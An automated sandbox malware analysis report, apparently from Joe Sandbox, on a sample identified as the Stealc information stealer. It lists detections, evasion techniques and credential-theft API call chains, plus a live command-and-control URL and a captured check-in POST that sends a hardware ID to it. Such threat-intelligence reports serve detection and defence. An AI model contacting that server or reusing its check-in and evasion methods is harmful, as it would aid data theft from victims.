
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1562275
MD5: 754418530dca8e93cba3a5a7f409f441
SHA1: b847b0861f4e1d1d309c0bdf51f02fb8954663f7
SHA256: 0d025b505282376cd436001c8148e720475463ac9c266bf3788689f93147a178
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 1488 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 754418530DCA8E93CBA3A5A7F409F441)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000003.2177796637.0000000005080000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2264756747.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 1488 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 1488 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-25T12:58:18.417120+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49722 | 185.215.113.206 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.phptop | Avira URL Cloud: Label: malware
Source: file.exe.1488.0.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E34C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00E34C50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E360D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00E360D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E540B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00E540B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E46960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00E46960
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E3EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_00E3EA30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E39B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00E39B80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E46B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00E46B79
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E39B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00E39B20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E37750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00E37750
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E418A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00E418A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E43910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E43910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E41269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E41269
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E41250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E41250
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00E4E210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00E4CBE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E423A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00E423A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E3DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E3DB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E42390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00E42390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E3DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E3DB99
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E44B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00E44B29
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E44B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E44B10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E4D530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_00E4DD30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E316A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00E316A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E316B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00E316B9

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49722 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GIIEGHIDBGHIECAAECGD
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 30 46 39 31 46 35 43 46 33 36 33 38 34 38 34 36 38 37 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 2d 2d 0d 0a
    Data Ascii:
    ------GIIEGHIDBGHIECAAECGD
    Content-Disposition: form-data; name="hwid"

    620F91F5CF363848468766
    ------GIIEGHIDBGHIECAAECGD
    Content-Disposition: form-data; name="build"

    mars
    ------GIIEGHIDBGHIECAAECGD--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (reported 8 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E36C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,0_2_00E36C40
Source: file.exe, 00000000.00000002.2264756747.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2264756747.0000000000D67000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264756747.0000000000D55000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264756747.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2264756747.0000000000D83000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2264756747.0000000000D67000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000000.00000002.2264756747.0000000000D83000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpH
Source: file.exe, 00000000.00000002.2264756747.0000000000D67000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phptop
Source: file.exe, 00000000.00000002.2264756747.0000000000D67000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpw
Source: file.exe, 00000000.00000002.2264756747.0000000000D67000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ws
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E39770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop,0_2_00E39770

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EE11E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E548B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EA987
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E909D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0116C09C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011D88A2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011F48ED
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011E7395
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01143A5F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EFA53
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011EC525
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0119DD9D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011F2DDD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010B1CCF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01269758
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010E47E5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011F1E6E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010CBE88
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00E34A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: mipucltu ZLIB complexity 0.994617362603623
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E53A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00E53A50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00E4CAE0
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\R5TONLTV.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1773568 > 1048576
